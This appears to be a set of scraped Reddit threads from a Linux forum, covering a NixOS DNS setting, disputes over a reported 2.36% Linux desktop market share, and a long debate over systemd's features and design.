    
      networking = {
        nameservers = [ "127.0.0.1" "::1" ];
        networkmanager = {
          enable = true;
          dns = "none";
        };
      };

I love NixOS.
Sounds like Ubuntu issue.
Ok maybe I didn't pay enough attention when I learned that part in university but DNS is th dynamic name system right?

In this case:

Why would you want to configure it on every end machine?

Configure it in the router or a sub system that manages the client's.

When your client pc is not physically connected to the network use a VPN and then the DNS also works.

This means you only have one or up to three places to manage and install a DNS.

But I never worked as in IT and have no practical experience. So maybe my idea is stupid for some reason.
According to https://netmarketshare.com, Linux market share is now at record high 2.36%
To put it in perspective, somewhere slightly less than half of MacOS.
Windows XP 6.94% - now we have a goal
[deleted]
I'm curious about how much of that is ChromeOS.
Hell, at this rate, we'll eventually have a "Year of the Linux Desktop" to celebrate adoption.
[deleted]
what market? desktop i assume, server market share is waaaay more than that
What a load of crap.

The link at the top which states (Source of Analytics Data) doesn't lead any source but rather to an analytics provider, TrueStats. Their FAQ is not available, there is no info about anything. 

This is poor junk, arbitrary numbers given by an anon no one which represents nothing.

Best part - the links on the news stream at the side, like the one to the techcrunch article [Chrome Starts To Take Off In Mobile Browser Share, But Android Dips Among Mobile Operating Systems](https://techcrunch.com/2013/06/03/chrome-starts-to-take-off-in-mobile-browser-share-but-android-dips-among-mobile-operating-systems/) from 2013.

tl;dr nothing to see here, don't waste your time.
This source doesn't seem reliable at all. When I selected the Consoles marketshare, it reported:

- Playstation - 92.05%
- Wii - 7.95%
I actually managed to get a Steam Hardware Survey, too. Hopefully those numbers are good too!
I have an Android phone in my pocket (Linux).

My computer I am typing this from is Debian Linux.

My Cisco router is Linux

My ISP is Linux

My DNS is Linux

Reddit is Linux

Would this put Linux a tad over 2.36%?
It looks like they gather data from about 40,000 websites only. 

So, my question is, is the data accounting for users who utilize services such as NoScript or Ghostery to prevent tracking cookies from gathering such data? If they're blocked from seeing the OS, then how do they report those users? Also, how do they account for dual-boot users, which likely account for a large percentage of Linux users? If they base it solely on the OS that was triggered by their cookie on one visit, then it might not create an accurate picture when the user actually is dual boot and just happened to make an initial visit on their Windows or MacOS partition. 
1999 will be the year of linux on the desktop!
> Linux **DESKTOP** market share now at 2.36%

FTFY

Linux's overall market share is easily over 80%.
Linux is the only OS that works on anything from wristwatches to massively parallel super computers. It is uniquely positioned to take over whatever happens in the future when the paradigm shifts away from the desktop os.

Neither windows nor apple can make that shift in any meaningfull way. Linux will take over eventually. Though probably not as a desktop OS.
Why does everyone only focus on desktop market share?
Most mobile phones are Linux (Android).
Most servers are Linux.
Most networking hardware is Linux [citation needed].
A ton of laptops are Linux due to Chromebooks.

So why does everyone play Microsoft's game and focus on the numbers where it looks like Linux is ignorable?
StatCounter showing for may 2017 - Linux at 1,78%
Source: http://gs.statcounter.com/os-market-share/desktop/worldwide#monthly-201605-201705
Go Linux Go!!!
That's the market share for Desktop use, I guess.

I might be wrong, but if we include what's running in the cloud, I bet Linux is easily in the first position. 
Is Linux share including ChromeOS?
Mint Xfce all day! 
Shows 1.65% for me, what am I doing wrong?
I'm trying to build my first Netbox on an Ubuntu VM. So I'm pretty sure everyone here owes me a thanks for pushing this number up.
This is only web traffic share though - doesn't account for all devices
Great.  Been using Linux off and on since around '99.  I've a spare HDD installed right now just beggin' for some dual-bootin' love.  Old Velociraptor 10K 160GB.  
Once something captures 10% from the market leader it means the momentum has changed and it is certain the market leader will be replaced.

So in a way Linux is already 25% done with it's mission.
Interestingly, I read somewhere that Linux share is based only on those 'officially registered' (for eg., direct download from sites which the companies can track) and doesn't account for all those that get the OSes elsewhere (copy from a friend, torrents, etc.). Unlike MS and Apple, companies developing Linux distros can't track users' count (not as much as they'd like anyway) because they don't charge for them and the free licenses allow for liberal spread without supervision. Also, he alleged that methods used to calculate OS shares are unreliable since most of them are based on visits to popular sites and doesn't account for those that have different habits; they methods are not comprehensive. Don't remember the details but the writer alleged that the share was actually around 4.5% (this was at a time when Linux held 1.x%). 
And how many of it are Chromebooks?
Great :) 
[removed]
which market?
All the Raspberry Pis quadrupled the market share.
I....uh...Unix supremacy! 
####[Sorry Windows, Android, (a Linux OS),  is now the most popular end-user operating system](http://www.zdnet.com/article/sorry-windows-android-is-now-the-most-popular-end-user-operating-system/)

\^thats a link to the same titled article

title from article.  "a Linux OS", added by me. 
To the Moon
2017 WILL BE THE YEAR OF THE LINUX DESKTOP!
Hell yeah
Thats points to browser shares. . Where is the info you saw on OS shares? 
IOMMU and VT-d are poised to make this much much larger if it can only go turn key.
I implemented like 5 VM Ubuntu servers last month. You're welcome. Lol
It would be fun to see server market share...
Occasionally I look for indicators in non traditional/non computer related places (from people with user profiles that start off  "I live in a small town where i was raised." etc) . Most recently was an i-say poll I made asking "Anyone else running GNU/Linux for an operating system?".   
 [23% voted yes ! :)](https://social.i-say.com/poll/anyone-else-running-gnu-linux-for-an-operating-system/300251672)
I just installed recently. Now, I'll become more of a reutine user if I can get sound to come out of my nVidea HDMI. 
It's the year of the Linux desktop!
*Margin of error: 3%

(JOKING)
So this data is useful only in the consumer space right? You almost never have a server using it's web browser, assuming you have even installed that to begin with. And honestly, Microsoft is the one pushing people to other OSs they keep making there's more annoying and intrusive.
Now only if I can get my xps 13 to wifi to work we'll be at 2.37%.
you mean "on the desktop".
and 99% of IoT market, which actually matters.
or closer to 50.00001% when you count all the cell phones, servers, super computers, rasberry-pi, industrial SBC/s etc...  instead of just the desktop market. 

Shit, Google alone has more than 8% of the servers in the world. 
I'm over 20 years as a Linux desktop user and still no virus or malware of any kind, I'm liking being the small fish.
>Desktop Top Browser Share Trend

You can have all the Linux on the Desktop you want.

I, for one, care more about *any other use case*. Consumer trends don't tell the story.
Honestly this should be GNU market share and NOT Linux.

I would love to see the number of instructions running through the Linux kernel on this planet.     I suspect we would be shocked how large it is but more importantly the trend.
Windows XP is still more popular than macOS or Linux. Those graphs make me sick...
WHOA! 2.36% after 20 years! So good. So, so good.
2.36%?  Of what?  They had to pull that out of their ass.  Linux continues to dominate in the server market.  What about the millions (or is it billions now?) of Android devices that have 85% of the mobile market?  What about all the IOT devices, embedded firmwares, etc.?  This metric is rather pointless.
2017 is going to be the year of Linux! ^^^^^/s
YOTLD
This is a bit of a rant, a bit of an educational post, and really came about because I'm just tired of how much flak systemd got and still gets based on obscure philosophical "issues". That's not to say I fully disagree, I'm just a pragmatist. I think it's better in a lot of ways. But when someone comes in to defend systemd, what do they usually have to offer? What improvements justify that philosophical sacrifice? "Uh, it boots fast. And BASH is annoying." Cool. Clearly that's convinced some people, but it doesn't really give any *compelling* reasons for why it's "better". 

The documentation for systemd is utter crap, and finding out everything about what it can do involves slogging through pages and pages of boring documentation with no examples. Even those who have been using systemd for years probably have no idea of half of what it can do.

So I'm here to tell you about a couple *really cool features* that you probably never heard about, that might change your mind about systemd, at least in a practical sense. If they don't, that's fine. But at the very least, if you're stuck with it in every major distro, you can at least know some neat features that might be useful to you!

# #1 - Seriously, `service` units are great.

This one does come up a lot as a defense, but I'd be remiss not to repeat it. Boilerplate BASH SysV initscripts are crap. They're fragile, they're annoying to read, they're annoying to write, and half the time they're just calling `start-stop-daemon` anyways, which is a half-assed service manager at best. Systemd units are clean, concise, and powerful. They're worth a look on their own merits if you've ever written an initscript and hated every moment of it. You can auto-restart failed units, you can delay the restart, you can do actions... so much power, no BASH knowledge necessary.

# #2 - [Email yourself (or do whatever you want) on a service failure.](https://serverfault.com/a/701100/188250)

This is a cool little feature of units. You can specify an `OnFailure` entry in your unit to execute *another* arbitrary unit if the service fails. For example, a `oneshot` unit that sends you an email. Or perhaps starting a secondary daemon to do something else. Really anything you want.

# #3 - `ExecPreStart`/`ExecPostStart` and similar `Stop` commands

OK, yea, you can do this in BASH initscripts too, but Systemd just makes it so... accessible. Want to `git pull` before starting a service? Want to remove a cache directory on exit? Easy peasey. Add `ExecPreStart = /path/to/myscript` to execute `myscript` before starting the main `ExecStart`. And systemd will fail the whole unit if the `Pre` command fails. If you don't want that, you [can make them optional as well](https://unix.stackexchange.com/questions/404199/documentation-of-equals-minus-in-systemd-unit-files) by adding a `-` before the path.

# #4 - [Mount units](https://oguya.ch/posts/2015-09-01-systemd-mount-partition/)

This is a biggie. You may have heard of them in the context of `fstab`, how Systemd "destroys" it. But this is incredibly short-sighted. First, editing fstab programmatically (looking at you, Ansible) is a pain in the ass and fraught with dragons. Mount units let you create mount definitions atomically. Second, you can depend anything on them! Imagine you have an NFS filesystem and a Free Software Media server (shameless /r/jellyfin plug). You don't want that server to start if your filesystem isn't mounted, because bad things would happen if you do. What can you do? `mount -a` is a hack. No - use a `.mount` unit for your NFS volume, and then `Requires = my-mount.mount` in the service! Now you're safe.

There is one major caveat though: if you have a `-` in your mount directory target, you're going to have a *very bad time*, since the unit is named `path-to-mountpoint.mount` with the `-` replacing the filesystem `/` separator, and escaping the dashes almost never works. Otherwise, though, they're incredibly powerful.

# #5 - [Simple overrides with `unit.d` directories](https://unix.stackexchange.com/a/468067)

Have a unit installed by an operating system package, but you want to do some interesting things to it? The first thing everyone thinks is to just edit the `/lib/systemd/system/my-unit.service` file and go wild. But, this will be overwritten on an upgrade. OK, you might read a bit, and then copy it from `/lib` into `/etc`. That won't be overwritten. But now you've duplicated the unit, and won't get nice improvements from your packages. The solution? `/etc/systemd/system/my-unit.service.d/`! Using this directory, you can override small components of the unit file with your own values, for instance adding an `ExecPreStart` or a `Requires`. The above example uses the `systemctl edit` function, which automatically creates these overrides, but you can drop these files in manually too using your configuration management of choice.

# #6 - Targets - group services, mounts, etc. together

Target units are another really cool feature of Systemd. You've probably seen stuff like `Reached multi-user.target` in your boot logs, but you can of course create your own `targets` as well. Simply put, they group other units together. If two services and a mount are part of a target, the target won't be reached until all of them start, and you can, with a few modifications to the units - using `PartOf = mytarget.target` in the `[Unit]` section of the services/mounts - control all the services by stopping or starting the target itself, in the right order. Depend other services on targets as well for maximum control of the startup sequence. There's a ton of power here.

# #7 - `systemctl enable` and `systemctl disable`

This is a really basic one, but want to turn off a service or mount for a bit? Disable it! Want a service that is installed by default (such as `nginx`), but want to start it with `supervisord` instead and are getting a conflict? Disable it!

# #8 - PIDFile

A nice thing about Systemd is that you don't ever have to worry about PID files, including weird stale PIDfiles lying around and messing with your service startup. But still want one? You can still add one with `PIDFile=`.

Edit: this did the opposite thing I thought it did, ignore it.

# #9 - Sockets units can replace [x]inetd

The old style, "run a script on a socket connection" tool inetd and its modern successor xinetd can be replaced by [systemd `.socket` units](https://www.linux.com/blog/end-road-systemds-socket-units), bringing the ease of use and control of Systemd to your inetd services!

Those are the first 9 I can think of right now, but if you have any of your own cool systemd tricks, I'd love to hear them too!
Don't depend directly on mount units; use `RequiresMountFor`. It lets you specify a path on the filesystem and your unit will automatically depend on the mount units for any mounts under that path.
[User units.](https://wiki.archlinux.org/index.php/Systemd/User) Have a service come up when you log in and go away when you log out, no XDG support required (which means it also works on console, and possibly even when logging in over the network).
Regarding #8: systemd will not create a PIDFile for you. That option is actually used for letting systemd know where a daemon stores it's PIDFile if it creates one.

&#x200B;

From the docs:

>Takes an absolute file name pointing to the PID file of this daemon. Use of this option is recommended for services where Type= is set to forking. systemd will read the PID of the main process of the daemon after start-up of the service. systemd will not write to the file configured here, although it will remove the file after the service has shut down if it still exists.
This isn't going to convince people that already don't like systemd. They don't care about it having so many features, they don't *want* it to. Most of the things you listed are going to be considered downsides.
Systemd timers are possibly the best thing ever. When deploying a new update, we used to disable cron and try to remember what needed to be run manually afterwards. Systemd timers allow you to disable the timer, but when you enable them it'll run if it was supposed to have run while disabled.
Linus Torvalds on systemd back in '14: [https://youtu.be/5PmHRSeA2c8?t=1160](https://youtu.be/5PmHRSeA2c8?t=1160)

&#x200B;

tldw: It gets the job done and improves over SysVinit.
I might be in a minority because I'm neither a lover nor a hater.

The good things:

\- I find the units format to be far better than the old init scripts. Yes, the scripts were bash but it was very complex and generally not meant to be edited. You had to learn the library of bash functions provided by the distro.  
\- the concept of a master manager process launching processes as children is very Unix-y. This has clear benefits like the immediate knowledge that some process died. The fact that the old init systems don't have it is a major drawback.  
\- finally we have a standard (cross-distro) way for system management. So the knowledge and tools are preserved, and if some software provides an init script you know it's systemd.

The bad things:  
\- I'm constantly getting some problems on startup/boot (delays, had to mask some services), and I'm using a regular PC (Ubuntu 18.04, Fedora 30), not a laptop. That didn't happen in the old days. But I didn't notice these problems on servers.  
\- I feel like there's a lot of complexity built just to save a couple of seconds of boot time. I'd happily wait 5 seconds longer to gain more predictability and stability.  
\- journalctl might be too much in terms of replacing Unix tools with a do-it-all tool
Systemd is neat in principle, but a lot of this falls down in the design and implementation. I remember advocating for tighter integration into systemd in a recent project, because I really like the idea of a proper service manager, but systemd is a surprisingly poor service manager IMO.

> And systemd will fail the whole unit if the Pre command fails. If you don't want that, you can make them optional as well by adding a - before the path.

Oh, cool, what does that do? From your link:

> ...which indicates that if the file does not exist, it will not be read and **no error or warning message is logged.**

...erm... what? What if I want something to not fail the entire service, but at least log a warning so I know what happened if this ends up being important? The nice thing about Bash scripts (or any other kind of script) for this purpose is, real programming languages (including Bash) let you decide what happens on failure.

Arguably this is where you make your pre command log a warning and return success... it is quite easy for systemd pre-commands to start getting *spectacularly* ugly before someone finally gives in and moves them to a separate script.

> Second, you can depend anything on them! Imagine you have an NFS filesystem and a Free Software Media server (shameless /r/jellyfin plug). You don't want that server to start if your filesystem isn't mounted, because bad things would happen if you do. What can you do? mount -a is a hack.

...wait, why? Basically, the advantage of mount units over `mount -a` is the ability to either have filesystems that you only mount when needed, or services that you start in parallel with mounting filesystems that you think they won't depend on. Both of those have nasty failure modes, which is why you probably want your services to depend on `local-fs.target`, which is the moral equivalent of depending on `mount -a`.

I will concede that it's nicer to inject a mount unit than to edit fstab... but as you start to go down that road, well, I was surprised to learn that [template expansion doesn't work for mount units](https://github.com/systemd/systemd/issues/3504). That was closed with a claim that the equivalent feature was implemented with dash-prefixes, which, no, it fucking wasn't, templates accomplish entirely different things. The closest thing to an equivalent feature is generators, which you have to design to run in a ridiculously-limited environment where even logging might not be available. So what you actually end up doing if you go this route is programmatically modifying your mount units in /etc or something, and programmatically modifying /etc is a bit of a code smell, though it's nowhere near as bad as /etc.

That, and:

> There is one major caveat though: if you have a - in your mount directory target, you're going to have a very bad time...

You said it, not me. All I can really add here is: On top of what I feel are actual deficiencies in systemd's design, it's also highly opinionated, so if you find yourself trying to do something slightly different, even as minor a difference as having a directory name with a `-` in it, you immediately give up on systemd and roll some shell scripts.

Speaking of dashes:

> The solution? `/etc/systemd/system/my-unit.service.d/`!

Remember those dash-prefixes from earlier? That means you can also add your modifications to `/etc/systemd/system/my-.service.d/`. And also probably `/lib/system/system/my-.service.d/` and `/usr/local/system/system/my-.service.d/`. Which means, when you're trying to figure out how a service is actually configured, it's not good enough to just find the config file, because there's probably more than one config file. In fact, you'll probably also need to 

This means, by the way, that `-` is a namespace separator in systemd. This is weird and counterintuitive, and it's really not hard to find examples of services that use `-` just to separate words without intending to imply a namespace. Just looking at the built-in targets on my system, I see `ctrl-alt-del.target`, and `suspend-then-hibernate.target`, and `hybrid-sleep.target`... you get the idea. Once you get literate in systemd, those names look weird -- `ctrl-alt-del.target` reads like `ctrl::alt::del()` would in C++ or `ctrl.alt.del()` in JavaScript. But if you didn't know this about systemd, they'd look perfectly natural, and you'd have no idea that this all secretly supports `ctrl-.target.d/` just in case someone wanted to affect both `ctrl-alt-del.target` and `ctrl-c-ctrl-v.target` or something.

> If two services and a mount are part of a target, the target won't be reached until all of them start, and you can, with a few modifications to the units - using `PartOf = mytarget.target` in the [Unit] section of the services/mounts - control all the services by stopping or starting the target itself, in the right order.

This sounds great, until you dig deep into how all these dependencies are defined. In particular, from the documentation on `PartOf`:

> Note that this is a one-way dependency — changes to this unit do not affect the listed units.

So, let's say you have a target called `dbserver.target`, and you want to have other things that depend on it, like, say, `webserver.target`. You want these to be hard dependencies; you don't want to start the webserver until the dbserver is up. So you define units like `postgresql.service` as `PartOf = dbserver.target` -- and it's a handy abstraction, because maybe one day you'll add `pgbouncer.service` as well... And of course `dbserver.target` is `PartOf = webserver.target`...

Here's what I might expect from such a service: `systemctl restart postgresql.service` would stop the webserver first, restart the dbserver, then start the webserver. Or, at least, it would shut down the webserver first....

Nope, not with PartOf, it'll happily restart (or just stop) the dbserver all on its own. But it does mean that if you stop `webserver.target`, you'll also stop the database server, which is probably not what you were expected.

So you have to untangle the web of `Requires` and `Wants` and `BindsTo` and `Before` and `After`, and figure out exactly which combination of these will make your web of services do what you want. An example of some of the ugly surprises waiting for you here:

> If a unit foo.service requires a unit bar.service as configured with Requires= and no ordering is configured with After= or Before=, then both units will be started simultaneously and without any delay between them if foo.service is activated.

But if you depend on `After=` or `Before=`, beware the [many surprising behaviors systemd has for when a process is considered to have started successfully](https://www.freedesktop.org/software/systemd/man/systemd.service.html#Type=):

> If set to `simple` (the default if `ExecStart=` is specified but neither `Type=` nor `BusName=` are), the service manager will consider the unit started immediately after the main service process has been forked off.

That's probably not what you wanted! Granted, it's hard to do this kind of thing in general, but it was much clearer in Bash scripts -- sure, 99% of the time, you'd have a `case` that did `start-stop-daemon --start` if you invoked the script with `start` as an argument, and `start-stop-daemon --stop` if you invoked it with `stop` as an argument, but it was doing this from within a very procedural context in which you could easily (and people very often did) add some appropriate command to make sure that the service had actually started.

> This is a really basic one, but want to turn off a service or mount for a bit? Disable it!

It's a nice feature, but it's one that even sysvinit had.

> The old style, "run a script on a socket connection" tool inetd and its modern successor xinetd can be replaced by systemd .socket units, bringing the ease of use and control of Systemd to your inetd services!

By now, you probably know my opinion on the kind of "ease of use" and "control" that Systemd provides... but I have to ask, what was wrong with inetd, exactly? Just saying "systemd can do this thing that you used to be able to do with a completely separate, optional software package that could easily be replaced by another implementation without disrupting the rest of the system" is... not really an argument for liking systemd.

So, while I very much agree that something *like* systemd is a good idea, I'm not convinced that systemd itself is quite there yet. But I think it's worse than pulseaudio this time around, because I think some of the problems with systemd are *design* problems -- you can fix pulseaudio crashing and stuttering all the time, and I'm sure eventually journald will be fixed so it stops corrupting and shitting itself, but the entire concept of journald was a mistake compared to just dumping a bunch of text to logfiles and gzipping the old ones. Nothing's stopping us from fixing those problems, except it seems like at least some of the things I hate about systemd are *deliberate, ongoing* design decisions coming straight from the top, so it seems unlikely they'll be fixed short of forking.

And, systemd is monolithic enough that with a few happy exceptions (like journald), you can't easily replace the pieces you don't like. That's probably the biggest reason I hate systemd. The beauty of the Linux desktop was just how much of it you could rip out and replace if you didn't like it -- just look at the wonderful world of window managers and Wayland compositors! "Do one thing and do it well." Well, even when systemd is nice enough to split things into separate processes, those processes are tightly-coupled along poorly-documented interfaces, so it's not trivial to replace the pieces of systemd you don't like. And if what you don't like is the unit dependency system itself...
> It can do so much more

That's the **first** reason people hate systemd!
Most of this is nice, but none of it counters the point that it shouldn't be init. These are all advantages of being a supervisor system. If it was only a supervisor and sat on top of init, very few people would hate it.

Its a network stack, init system, boot loader, supervisor, login manager, device manager, and tons of other stuff. It shouldn't be doing all of this. I know there are different binaries, but most of them depend on each other. If systemd was no longer a monolith and those binaries could operate individually, most systemd haters would be happy.
Using mount is a hack? Don't get it...

>There is one major caveat though: if you have a `-` in your mount directory target, you're going to have a *very bad time*

Let me introduce you to:

`systemd-escape --path ”/your-weird/path/right here/”`
Ever heard about runit?
> obscure philosophical "issues"   
   
If they're so obscure, then why are they the most common arguments, and why are they what the BSDs are based on, and most of Linux was based on up until 5 years ago?
At work we have a small NAS with an iSCSI export, and our little server imports it and mounts the ZFS filesystem on it to share things like SVN, Samba file shares, etc.

* My iSCSI daemon depends on the network
* My iSCSI login depends on the daemon
* My ZFS import depends on the iSCSI login (and, soon, block device)
* Samba and Apache depend on the ZFS path

Our local dev VMs have a systemd generator that scans our uwsgi config, gets a list of all the apps in there, checks which ones actually exist (not every dev needs to check out every service), and creates service files for them, which are required by `uwsgi.target`, which is required by multi-user boot, and which requires Redis, haproxy, and activemq.

The vast majority of services have no wrote access to the filesystem except for `/var/{log,lib,run}/servicename`, can’t gain privileges, lose privileges they had but don’t need, can’t launch privileged processes (like `ping`), can’t see any other users on the system, and can’t open sockets they don’t need.

You can do all that with shell scripts, but f that.
Meh. I wrote my own little init in C and it does everything I need it to do.
I mean I use systemd every day on my laptop and desktop. It's *not* faster. Every time I touch a distro that uses another init I'm always jealous of how much faster it boots up. Especially runit. Runit just seems so elegant and transparent, even though (especially because?) it's got all that shell scripting. SystemD might have all that neat functionality, but I'm just random end user #285948561. I just want my computers to *fast*.
OP, what is systemd?

1. Systemd was initially advertised as just an init system.
2. Some people saw it as more than just an init system and were called names.
3. GNOME later on picked it as a dependency and some people wondered why a DE would care about what init system is running and others used this as proof that systemd was more than just an init system and both of these group of people were called names.
4. Much later on, some people conceded that systemd is more than just an init system and much more people still see it as just an init system and it seems OP is in this group. You are suffering from a misleading marketing campaign around systemd.
5. Some people complain of all the additional things systemd is doing other than being an init system, like absorbing udev.
6. Why do you think GNOME is the only DE that requires systemd as PID1? They wont say it requires it, they will say it requires just a bunch of DBUS API that just happened to be offered by logind, a component of systemd that just also happen to require systemd being PID1. This is like saying Microsoft Office for windows does not requires microsoft windows operating system, just a bunch of win32 API that just happen to be present in microsoft windows operating system and use microsoft office running in linux under wine as proof of this statement.
7. All you have mentioned are properties of the component of systemd that makes the PID1 and seems to be missing a big part of the complaining, the rest of systemd,lies, deceit and politicking.
> The documentation for systemd is utter crap, and finding out everything about what it can do involves slogging through pages and pages of boring documentation with no examples. Even those who have been using systemd for years probably have no idea of half of what it can do.

I'll take a well-documented init system over systemd whenever possible. 

I think you would like to assume that there are only bad reasons for people disliking systemd, much like the rest of the systemd development team. This approach is antisocial. If systemd is as good as you say it is, the evangelism is unnecessary - let the product stand on its own.
>"You probably hate systemd because you think it's all about "boot fast no bash" - **but it can do so much more you probably had no idea about**."

That's precisely why people dislike Systemd, it shouldn't do much more, it should be just an init system.
I remember when I wrote my first .service file vs when I first wrote my first startup script. 

With the .service file, I googled the documentation, copied some text, pasted into a file, modified here and there and I was done in 5 minutes. And it worked. Worked perfectly from the get-go.

The startup script? Yeah, I made it work after starting from an example one. Kinda. Almost. Sorta. After many hours. And lots of sweat.

The problem with systemd is about the developers and their arrogance and unwillingness to listen to reason sometimes. Other than that, it's cool.
>"Uh, it boots fast."


That line right there should be enough to tell you to ignore that person. Try almost any other init system and tell me systemd is fast.


This post shows that you don't understand why people hate systemd because it has nothing to do with a lack of features, it's because it has too many "features" and does none of them well.


Want logs of that crash? >!too bad, systemd ate them!<
BASH annoying? WTF man?
Thank you for this very informative post, Lennart.

&#x200B;

^(It didn't convince me though.)
This is all well and good, but why does systemd manage my DNS and network? It's an idea so Harebrained that even windows does not do it.

Systemd should stay what it was presented as - an init and services management system. No need to run a quasi kernel as pid 1.
Linux, now it's AIX.
[removed]
you got it wrong

this

>but it can do so much more you probably had no idea about

is actually the reason many don't like systemd. It's doing too much for an init system that it tries to be.

&#x200B;

>Make each program do one thing well. To do a new job, build afresh rather than complicate old programs by adding new "features".

[https://en.wikipedia.org/wiki/Unix\_philosophy](https://en.wikipedia.org/wiki/Unix_philosophy)
No, I hate systemd because last time I misconfigured my network I had to wait 5 minutes for my system to boot so I could fix it.  I'm happier to have broken services that I can restart than a computer that wont boot.
No one is arguing against the merits of systemd. The primary arguments against systemd is its hardly auditable source code, monolithic nature, doesnt follow the unix philosophy and its feature creeping. Can I chose to run Ubuntu, Arch, Manjaro or any other common distro without systemd? The answer is no or sometimes "yes, but you gotta jump through these 20,000 hoops and do a backflip"
The UNIX philosophy of simple compositable tools is not obscure, and is very important. It is a serious reason to dislike systemd.
>[but it can do so much more you probably had no idea about.](https://www.reddit.com/r/linux/comments/bsqar4/you_probably_hate_systemd_because_you_think_its/)

and that's exactly its problem!

The sheer size and increasing complexity of the thing makes us -- those who appreciate systems that run reliably and \_predictably\_ shudder. It has a huge ever-growing attack surface, which makes it risky to both malfaesance and incompetence. While I cannot knock its documentation, the release cycle with redhat means an upgrade introduces backward incompatible changes that are several releases behind, breaking established scripts. But the big problem is: unexpected behavior. The majesty of init and things like runsv is that they were fundamentally script-based. Every sysadmin \_needs\_ to know scripting. But thanks to systemd, you need to know every possible configuration directive, whose documentation is spread chaotically across 8 or 9 man pages.   


Not too long ago, I encountered such a problem: I needed to insert some PHP code into an app, but I only wanted to do so temporarily. So I installed a piece of code in /tmp. An hour+ and a bleeding nose later, I finally realized that the only explanation for why my code wasn't executed was \_system fucking d\_. I realized that \_somehow\_ for \_god-knows-why\_, systemd was tinkering with /tmp. Sure enough, \_PrivateTmp\_ allows systemd to quasi containerize /tmp for -- you now, "security". OK, so it does. But it's shit like that which gets introduced in rolling updates that makes my graying hair fall out. I wasn't the only one with this frustration. Here's a writeup 6 months earlier of the same thing. [https://fluca1978.github.io/2018/04/19/ApacheSystemdPrivateTemp.html](https://fluca1978.github.io/2018/04/19/ApacheSystemdPrivateTemp.html)
No, I hate systemd because it does too much, and has become a gigantic pain in the ass to replace. I would actively like it to do less, and leave room for software developers who don't have brain worms to make pieces of my OS.

The Linux kernel is amazing, but every piece of software surrounding it just seems to devolve into utter trash.
[deleted]
That it does so much more is *what* I hate about it. Do one thing, and do it well.
But it doesn't even boot fast, with runit I can start up and shut down my system by the time systemd boots.
Sorry, I disagree.

For my desktop, systemd is great.

For a standard (non custom) server, systemd is OK.

For a complex customized setup systemd is a pain. OK, it has some benefits, but also some serious downsides. I could do most things in the old SysV system anyway, bash is not that hard, and the good old serial startup procedure has serious benefits in this case. Since you specifically mentioned the mount units, the fstab-generator does a terrible job, the dependency system is a hell in complex situations and it takes the devs far to long to realise there is a problem.
I hate it because journalctl  made logs complicated. It worked easily, why change and move some logs, making an inconsistent PitA for troubleshooting.
Systemd is great, it really solves many issues I had to deal with 10 years ago as a Linux sysadmin. But now it feels like it's 10 years too late.

Server world is switching to "one service per VM" model and small and secure minimal distros. There is no coming back, monstrous servers running multiple services with complex dependencies are legacy and are methodically replaced with newer, scaleable and highly available architectures. All we need in this model is to boot the server as quickly as possible and launch one single service. Most likely we won't even need to restart the service ever - if it fails it will be safer to dispose of the failed VM,  provision a new one and add to the cluster.

People are talking about how revolutionary and well designed systemd is, but all I see is a dinosaur from the same era as SysVinit. No guys, I don't want to learn yet another configuration syntax with all its quirks and legacy, I don't want to "easily include" something with ".mount" files, I don't want to write bash scripts to generate systemd scripts that will execute bash pre-scripts and bash post-scripts. It's exactly the same as before, just systemd is used instead of start-stop-daemon.

I want to write structured jsons and yamls, easily parseable and templateable, and I want to pass them to systemd to *ensure the state* of the services running on the server.
[removed]
Am I the only Linux user that literally couldn't care less about the systemd vs anti-systemd argument lol. As long as it works I don't care.
https://thehackernews.com/2019/01/linux-systemd-exploit.html?m=1

https://suckless.org/sucks/systemd/

https://www.theregister.co.uk/2018/10/26/systemd_dhcpv6_rce/

https://www.theregister.co.uk/2019/01/31/systemd_exploit
All of this is fine, but the effort is thrown away when the implementation is so large and fragile that upgrading the system should be done offline like a fucking windows installation.
`systemctl edit <unit>` makes editing so easy. No locating, no copying, just one command and you get an editor open to the right overlay file.
You already lost me "boot fast" because since I upgraded from Ubuntu 14.04 to 18.04 my boot time quadrupled, and then I didn't even mention post-login time...
Editing fstab in ansible is childishly easy. [https://docs.ansible.com/ansible/latest/modules/mount\_module.html](https://docs.ansible.com/ansible/latest/modules/mount_module.html) 

Other than that I completely agree that systemd has many uses, and most of the complaints about bloat are a tad exaggerated. It's 2019, we can suffer that 5MB extra ram use in exchange for convenience.
ITT: my opinions are better than yours

This is why kernel sources still have comments like "I don't understand how this works, but it does".

Few useful comments here and there though. I don't really have a stance on the matter. It's like "yet another Xorg vs Wayland thread".
I don't know if anyone cares, but here's my personal experience about using systemd to do something I had trouble to do with openrc.

I have some el cheapo gamepads that work fine, but their button mappings are different from what games expect. Instead of remapping then in every game (tedious, and some of them don't even offer this), I looked around for a solution to do this once and for all. Xboxdrv is a small daemon that originally was for making non standard xbox 1 controllers work, but it also can do a general button remapping. You just have to configure and start it, point it to the evdev device it should manage, and it will create a new one with everything as you want it.

So you want to start a daemon everytime you plug in a controller, perhaps for more than one, too, and terminate it when you unplug it again so games don't see a ghost evdev device.

I tried to do this with udev and scripts, I tried to do this with openrc, and I started pulling my hair and cursing, because it worked *sometimes*. Seems that sometimes the timings were off, something was racy, so when you unplugged and plugged back in, it was a toin coss if it would work. In top of that you had a lot of xboxdrv zombie processes that refused to die hanging in a io call forever.

Then I switched to systemd, read the documentation (that I actually liked? Don't know what the problem is with it), and wrote my first unit file doing all of this and more in something like two hours tops. Plus it's reliable: systemd doesn't leave processes behind - I'm uncertain how it gets rid of those hanged ones when I couldn't with killall, but it does. And it gets the timing right, out of the box.

That was all I needed from it to convince me. I never liked writing shell scripts (so many traps and hidden bugs when you don't do it regularly), they always were error prone and brittle, not only mine but those provided from various upstreams and distros, too. There's a whole class of problems I don't have anymore on my servers.

I don't even know if it really boots faster on my desktop than openrc did, I'm tempted to say it may even be a bit slower, but I don't care. (Plus there were some rare races in boot I never got rid of with openrc because waiting for the real internet connection did only work 95% of the time somehow).
>but it can do so much more you probably had no idea about.

That's actually one of the things I see more often criticized, that it does too much.
Systemd haters seem perfectly fine with doing all that themselves, with ad-hoc scripts or with a tool built specifically for the purpose.

If you look for it, you can make a pretty good case that this is the primary debate in all of engineering.  Some people really really value simplicity and understandability even if it just moves the complexity to a higher layer.

I'd imagine it's the same debate as automatic vs manual transmission, whiteboard vs PowerPoint, steel vs composite materials, vim vs VS Code, etc.

There's also the aspect of something analogous to mathematical purity that seems to appeal to many.

Some people want things that are obviously and visibly build up from basic elements in a consistent way, like the OSI network layering model.

